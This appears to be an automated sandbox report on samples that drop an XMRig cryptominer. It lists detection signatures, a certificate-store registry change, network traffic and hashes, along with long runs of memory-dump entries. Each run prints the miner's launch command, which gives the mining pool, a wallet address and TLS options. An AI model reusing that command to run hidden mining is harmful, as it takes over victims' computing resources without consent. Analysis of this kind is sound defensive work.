memory/1948-39-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-40-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-41-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-42-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-43-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-44-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-45-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-46-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-47-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-48-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-49-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-50-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-51-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-52-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-53-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-54-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-55-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-56-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-57-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-58-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-59-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-60-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-61-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-62-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-63-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-64-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-65-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-66-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-67-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-68-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-69-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-70-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-71-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-72-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-73-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-74-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-75-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-76-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-77-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-78-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-79-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-80-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-81-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-82-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-83-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

memory/1948-84-0x00007FF60B870000-0x00007FF60C373000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2968-16-0x000001B427B10000-0x000001B427B30000-memory.dmp

memory/2968-17-0x000001B427B60000-0x000001B427B80000-memory.dmp

memory/2968-18-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-19-0x000001B427B80000-0x000001B427BA0000-memory.dmp

memory/2968-20-0x000001B427BA0000-0x000001B427BC0000-memory.dmp

memory/2968-21-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-22-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-25-0x000001B427BA0000-0x000001B427BC0000-memory.dmp

memory/2968-24-0x000001B427B80000-0x000001B427BA0000-memory.dmp

memory/2968-23-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-26-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-27-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-28-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-29-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-30-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-31-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-32-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-33-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-34-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-35-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-36-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-37-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-38-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-39-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-40-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-41-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-42-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-43-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-44-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-45-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-46-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-47-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-48-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-49-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-50-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-51-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-52-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-53-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-54-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-55-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-56-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-57-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-58-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-59-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-60-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-61-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-62-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-63-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-64-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-65-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-66-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-67-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-68-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-69-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-70-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-71-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-72-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-73-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-74-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-75-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-76-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-77-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-78-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-79-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-80-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-81-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-82-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-83-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-84-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:26

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1802s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4816-14-0x00000211424A0000-0x00000211424C0000-memory.dmp

memory/4816-15-0x00000211424D0000-0x00000211424F0000-memory.dmp

memory/4816-16-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-19-0x0000021142510000-0x0000021142530000-memory.dmp

memory/4816-18-0x00000211424F0000-0x0000021142510000-memory.dmp

memory/4816-17-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-20-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-21-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-22-0x00000211424F0000-0x0000021142510000-memory.dmp

memory/4816-23-0x0000021142510000-0x0000021142530000-memory.dmp

memory/4816-24-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-25-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-26-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-27-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-28-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-29-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-30-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-31-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-32-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-33-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-34-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-35-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-36-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-37-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-38-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-39-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-40-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-41-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-42-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-43-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-44-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-45-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-46-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-47-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-48-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-49-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-50-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-51-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-52-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-53-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-54-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-55-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-56-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-57-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-58-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-59-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-60-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-61-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
